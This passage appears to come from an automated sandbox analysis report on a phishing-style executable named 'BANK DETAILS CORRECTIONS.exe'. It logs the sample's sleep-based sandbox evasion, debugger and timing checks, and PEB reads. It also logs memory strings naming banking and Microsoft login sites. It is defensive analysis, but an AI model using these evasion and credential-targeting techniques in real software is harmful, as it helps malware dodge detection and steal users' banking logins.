Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe TID: 7640 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7996 Thread sleep count: 1221 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5760 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8140 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7192 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8084 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe TID: 5668 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe TID: 7788 Thread sleep count: 1788 > 30
Source: C:\Windows\SysWOW64\sdiagnhost.exe TID: 7788 Thread sleep time: -3576000s >= -30000s
Source: C:\Windows\SysWOW64\sdiagnhost.exe TID: 7788 Thread sleep count: 8184 > 30
Source: C:\Windows\SysWOW64\sdiagnhost.exe TID: 7788 Thread sleep time: -16368000s >= -30000s
Source: C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe TID: 7920 Thread sleep time: -85000s >= -30000s
Source: C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe TID: 7920 Thread sleep count: 36 > 30
Source: C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe TID: 7920 Thread sleep time: -54000s >= -30000s
Source: C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe TID: 7920 Thread sleep count: 42 > 30
Source: C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe TID: 7920 Thread sleep time: -42000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\sdiagnhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\sdiagnhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: DC886F4.21.dr Binary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
Source: DC886F4.21.dr Binary or memory string: tasks.office.comVMware20,11696501413o
Source: DC886F4.21.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696501413h
Source: DC886F4.21.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696501413
Source: DC886F4.21.dr Binary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
Source: DC886F4.21.dr Binary or memory string: dev.azure.comVMware20,11696501413j
Source: DC886F4.21.dr Binary or memory string: Interactive userers - COM.HKVMware20,11696501413
Source: DC886F4.21.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696501413
Source: DC886F4.21.dr Binary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
Source: DC886F4.21.dr Binary or memory string: bankofamerica.comVMware20,11696501413x
Source: DC886F4.21.dr Binary or memory string: Canara Transaction PasswordVMware20,11696501413}
Source: DC886F4.21.dr Binary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
Source: DC886F4.21.dr Binary or memory string: Canara Transaction PasswordVMware20,11696501413x
Source: DC886F4.21.dr Binary or memory string: turbotax.intuit.comVMware20,11696501413t
Source: sdiagnhost.exe, 00000015.00000002.3732172786.0000000002696000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: DC886F4.21.dr Binary or memory string: Interactive userers - HKVMware20,11696501413]
Source: DC886F4.21.dr Binary or memory string: outlook.office.comVMware20,11696501413s
Source: DC886F4.21.dr Binary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
Source: BANK DETAILS CORRECTIONS.exe, 00000000.00000002.1303137425.0000000007540000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: DC886F4.21.dr Binary or memory string: account.microsoft.com/profileVMware20,11696501413u
Source: DC886F4.21.dr Binary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
Source: DC886F4.21.dr Binary or memory string: Interactive userers - EU WestVMware20,11696501413n
Source: DC886F4.21.dr Binary or memory string: ms.portal.azure.comVMware20,11696501413
Source: DC886F4.21.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413
Source: DC886F4.21.dr Binary or memory string: www.interactiveuserers.comVMware20,11696501413}
Source: DC886F4.21.dr Binary or memory string: interactiveuserers.co.inVMware20,11696501413d
Source: DC886F4.21.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696501413x
Source: DC886F4.21.dr Binary or memory string: global block list test formVMware20,11696501413
Source: DC886F4.21.dr Binary or memory string: outlook.office365.comVMware20,11696501413t
Source: EnKifmZDGZ.exe, 00000019.00000002.3733293559.000000000105F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll}
Source: DC886F4.21.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
Source: DC886F4.21.dr Binary or memory string: interactiveuserers.comVMware20,11696501413
Source: DC886F4.21.dr Binary or memory string: discord.comVMware20,11696501413f
Source: DC886F4.21.dr Binary or memory string: AMC password management pageVMware20,11696501413
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Process information queried: ProcessInformation Jump to behavior
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\sdiagnhost.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0196096E rdtsc 12_2_0196096E
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_00418C03 LdrLoadDll, 12_2_00418C03
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019A019F mov eax, dword ptr fs:[00000030h] 12_2_019A019F
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019A019F mov eax, dword ptr fs:[00000030h] 12_2_019A019F
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019A019F mov eax, dword ptr fs:[00000030h] 12_2_019A019F
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019A019F mov eax, dword ptr fs:[00000030h] 12_2_019A019F
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0191A197 mov eax, dword ptr fs:[00000030h] 12_2_0191A197
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0191A197 mov eax, dword ptr fs:[00000030h] 12_2_0191A197
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0191A197 mov eax, dword ptr fs:[00000030h] 12_2_0191A197
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01960185 mov eax, dword ptr fs:[00000030h] 12_2_01960185
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019DC188 mov eax, dword ptr fs:[00000030h] 12_2_019DC188
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019DC188 mov eax, dword ptr fs:[00000030h] 12_2_019DC188
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019C4180 mov eax, dword ptr fs:[00000030h] 12_2_019C4180
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019C4180 mov eax, dword ptr fs:[00000030h] 12_2_019C4180
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0199E1D0 mov eax, dword ptr fs:[00000030h] 12_2_0199E1D0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0199E1D0 mov eax, dword ptr fs:[00000030h] 12_2_0199E1D0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0199E1D0 mov ecx, dword ptr fs:[00000030h] 12_2_0199E1D0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0199E1D0 mov eax, dword ptr fs:[00000030h] 12_2_0199E1D0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0199E1D0 mov eax, dword ptr fs:[00000030h] 12_2_0199E1D0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019E61C3 mov eax, dword ptr fs:[00000030h] 12_2_019E61C3
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019E61C3 mov eax, dword ptr fs:[00000030h] 12_2_019E61C3
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019501F8 mov eax, dword ptr fs:[00000030h] 12_2_019501F8
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019F61E5 mov eax, dword ptr fs:[00000030h] 12_2_019F61E5
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019CA118 mov ecx, dword ptr fs:[00000030h] 12_2_019CA118
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019CA118 mov eax, dword ptr fs:[00000030h] 12_2_019CA118
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019CA118 mov eax, dword ptr fs:[00000030h] 12_2_019CA118
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019CA118 mov eax, dword ptr fs:[00000030h] 12_2_019CA118
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019E0115 mov eax, dword ptr fs:[00000030h] 12_2_019E0115
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019CE10E mov eax, dword ptr fs:[00000030h] 12_2_019CE10E
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019CE10E mov ecx, dword ptr fs:[00000030h] 12_2_019CE10E
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019CE10E mov eax, dword ptr fs:[00000030h] 12_2_019CE10E
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019CE10E mov eax, dword ptr fs:[00000030h] 12_2_019CE10E
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019CE10E mov ecx, dword ptr fs:[00000030h] 12_2_019CE10E
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019CE10E mov eax, dword ptr fs:[00000030h] 12_2_019CE10E
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019CE10E mov eax, dword ptr fs:[00000030h] 12_2_019CE10E
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019CE10E mov ecx, dword ptr fs:[00000030h] 12_2_019CE10E
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019CE10E mov eax, dword ptr fs:[00000030h] 12_2_019CE10E
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019CE10E mov ecx, dword ptr fs:[00000030h] 12_2_019CE10E
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01950124 mov eax, dword ptr fs:[00000030h] 12_2_01950124
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019B8158 mov eax, dword ptr fs:[00000030h] 12_2_019B8158
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01926154 mov eax, dword ptr fs:[00000030h] 12_2_01926154
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01926154 mov eax, dword ptr fs:[00000030h] 12_2_01926154
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0191C156 mov eax, dword ptr fs:[00000030h] 12_2_0191C156
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019B4144 mov eax, dword ptr fs:[00000030h] 12_2_019B4144
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019B4144 mov eax, dword ptr fs:[00000030h] 12_2_019B4144
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019B4144 mov ecx, dword ptr fs:[00000030h] 12_2_019B4144
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019B4144 mov eax, dword ptr fs:[00000030h] 12_2_019B4144
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019B4144 mov eax, dword ptr fs:[00000030h] 12_2_019B4144
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0192208A mov eax, dword ptr fs:[00000030h] 12_2_0192208A
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019E60B8 mov eax, dword ptr fs:[00000030h] 12_2_019E60B8
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019E60B8 mov ecx, dword ptr fs:[00000030h] 12_2_019E60B8
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019B80A8 mov eax, dword ptr fs:[00000030h] 12_2_019B80A8
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019A20DE mov eax, dword ptr fs:[00000030h] 12_2_019A20DE
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0191C0F0 mov eax, dword ptr fs:[00000030h] 12_2_0191C0F0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019620F0 mov ecx, dword ptr fs:[00000030h] 12_2_019620F0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0191A0E3 mov ecx, dword ptr fs:[00000030h] 12_2_0191A0E3
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019A60E0 mov eax, dword ptr fs:[00000030h] 12_2_019A60E0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019280E9 mov eax, dword ptr fs:[00000030h] 12_2_019280E9
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0193E016 mov eax, dword ptr fs:[00000030h] 12_2_0193E016
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0193E016 mov eax, dword ptr fs:[00000030h] 12_2_0193E016
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0193E016 mov eax, dword ptr fs:[00000030h] 12_2_0193E016
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0193E016 mov eax, dword ptr fs:[00000030h] 12_2_0193E016
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019A4000 mov ecx, dword ptr fs:[00000030h] 12_2_019A4000
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019C2000 mov eax, dword ptr fs:[00000030h] 12_2_019C2000
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019C2000 mov eax, dword ptr fs:[00000030h] 12_2_019C2000
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019C2000 mov eax, dword ptr fs:[00000030h] 12_2_019C2000
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019C2000 mov eax, dword ptr fs:[00000030h] 12_2_019C2000
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019C2000 mov eax, dword ptr fs:[00000030h] 12_2_019C2000
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019C2000 mov eax, dword ptr fs:[00000030h] 12_2_019C2000
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019C2000 mov eax, dword ptr fs:[00000030h] 12_2_019C2000
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019C2000 mov eax, dword ptr fs:[00000030h] 12_2_019C2000
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019B6030 mov eax, dword ptr fs:[00000030h] 12_2_019B6030
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0191A020 mov eax, dword ptr fs:[00000030h] 12_2_0191A020
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0191C020 mov eax, dword ptr fs:[00000030h] 12_2_0191C020
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01922050 mov eax, dword ptr fs:[00000030h] 12_2_01922050
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019A6050 mov eax, dword ptr fs:[00000030h] 12_2_019A6050
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0194C073 mov eax, dword ptr fs:[00000030h] 12_2_0194C073
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01918397 mov eax, dword ptr fs:[00000030h] 12_2_01918397
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01918397 mov eax, dword ptr fs:[00000030h] 12_2_01918397
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01918397 mov eax, dword ptr fs:[00000030h] 12_2_01918397
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0191E388 mov eax, dword ptr fs:[00000030h] 12_2_0191E388
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0191E388 mov eax, dword ptr fs:[00000030h] 12_2_0191E388
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0191E388 mov eax, dword ptr fs:[00000030h] 12_2_0191E388
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0194438F mov eax, dword ptr fs:[00000030h] 12_2_0194438F
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0194438F mov eax, dword ptr fs:[00000030h] 12_2_0194438F
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019CE3DB mov eax, dword ptr fs:[00000030h] 12_2_019CE3DB
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019CE3DB mov eax, dword ptr fs:[00000030h] 12_2_019CE3DB
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019CE3DB mov ecx, dword ptr fs:[00000030h] 12_2_019CE3DB
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019CE3DB mov eax, dword ptr fs:[00000030h] 12_2_019CE3DB
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019C43D4 mov eax, dword ptr fs:[00000030h] 12_2_019C43D4
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019C43D4 mov eax, dword ptr fs:[00000030h] 12_2_019C43D4
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019DC3CD mov eax, dword ptr fs:[00000030h] 12_2_019DC3CD
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0192A3C0 mov eax, dword ptr fs:[00000030h] 12_2_0192A3C0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0192A3C0 mov eax, dword ptr fs:[00000030h] 12_2_0192A3C0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0192A3C0 mov eax, dword ptr fs:[00000030h] 12_2_0192A3C0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0192A3C0 mov eax, dword ptr fs:[00000030h] 12_2_0192A3C0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0192A3C0 mov eax, dword ptr fs:[00000030h] 12_2_0192A3C0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0192A3C0 mov eax, dword ptr fs:[00000030h] 12_2_0192A3C0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019283C0 mov eax, dword ptr fs:[00000030h] 12_2_019283C0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019283C0 mov eax, dword ptr fs:[00000030h] 12_2_019283C0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019283C0 mov eax, dword ptr fs:[00000030h] 12_2_019283C0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019283C0 mov eax, dword ptr fs:[00000030h] 12_2_019283C0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0193E3F0 mov eax, dword ptr fs:[00000030h] 12_2_0193E3F0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0193E3F0 mov eax, dword ptr fs:[00000030h] 12_2_0193E3F0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0193E3F0 mov eax, dword ptr fs:[00000030h] 12_2_0193E3F0
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019563FF mov eax, dword ptr fs:[00000030h] 12_2_019563FF
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019303E9 mov eax, dword ptr fs:[00000030h] 12_2_019303E9
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019303E9 mov eax, dword ptr fs:[00000030h] 12_2_019303E9
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019303E9 mov eax, dword ptr fs:[00000030h] 12_2_019303E9
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019303E9 mov eax, dword ptr fs:[00000030h] 12_2_019303E9
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019303E9 mov eax, dword ptr fs:[00000030h] 12_2_019303E9
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019303E9 mov eax, dword ptr fs:[00000030h] 12_2_019303E9
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019303E9 mov eax, dword ptr fs:[00000030h] 12_2_019303E9
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019303E9 mov eax, dword ptr fs:[00000030h] 12_2_019303E9
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0191C310 mov ecx, dword ptr fs:[00000030h] 12_2_0191C310
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_01940310 mov ecx, dword ptr fs:[00000030h] 12_2_01940310
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0195A30B mov eax, dword ptr fs:[00000030h] 12_2_0195A30B
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0195A30B mov eax, dword ptr fs:[00000030h] 12_2_0195A30B
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0195A30B mov eax, dword ptr fs:[00000030h] 12_2_0195A30B
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019A035C mov eax, dword ptr fs:[00000030h] 12_2_019A035C
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019A035C mov eax, dword ptr fs:[00000030h] 12_2_019A035C
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019A035C mov eax, dword ptr fs:[00000030h] 12_2_019A035C
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019A035C mov ecx, dword ptr fs:[00000030h] 12_2_019A035C
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019A035C mov eax, dword ptr fs:[00000030h] 12_2_019A035C
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019A035C mov eax, dword ptr fs:[00000030h] 12_2_019A035C
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019EA352 mov eax, dword ptr fs:[00000030h] 12_2_019EA352
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019C8350 mov ecx, dword ptr fs:[00000030h] 12_2_019C8350
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019A2349 mov eax, dword ptr fs:[00000030h] 12_2_019A2349
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019A2349 mov eax, dword ptr fs:[00000030h] 12_2_019A2349
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019A2349 mov eax, dword ptr fs:[00000030h] 12_2_019A2349
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019A2349 mov eax, dword ptr fs:[00000030h] 12_2_019A2349
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019A2349 mov eax, dword ptr fs:[00000030h] 12_2_019A2349
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019A2349 mov eax, dword ptr fs:[00000030h] 12_2_019A2349
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019A2349 mov eax, dword ptr fs:[00000030h] 12_2_019A2349
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019A2349 mov eax, dword ptr fs:[00000030h] 12_2_019A2349
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019A2349 mov eax, dword ptr fs:[00000030h] 12_2_019A2349
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019A2349 mov eax, dword ptr fs:[00000030h] 12_2_019A2349
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019A2349 mov eax, dword ptr fs:[00000030h] 12_2_019A2349
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019A2349 mov eax, dword ptr fs:[00000030h] 12_2_019A2349
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019A2349 mov eax, dword ptr fs:[00000030h] 12_2_019A2349
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019A2349 mov eax, dword ptr fs:[00000030h] 12_2_019A2349
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019A2349 mov eax, dword ptr fs:[00000030h] 12_2_019A2349
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019C437C mov eax, dword ptr fs:[00000030h] 12_2_019C437C
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0195E284 mov eax, dword ptr fs:[00000030h] 12_2_0195E284
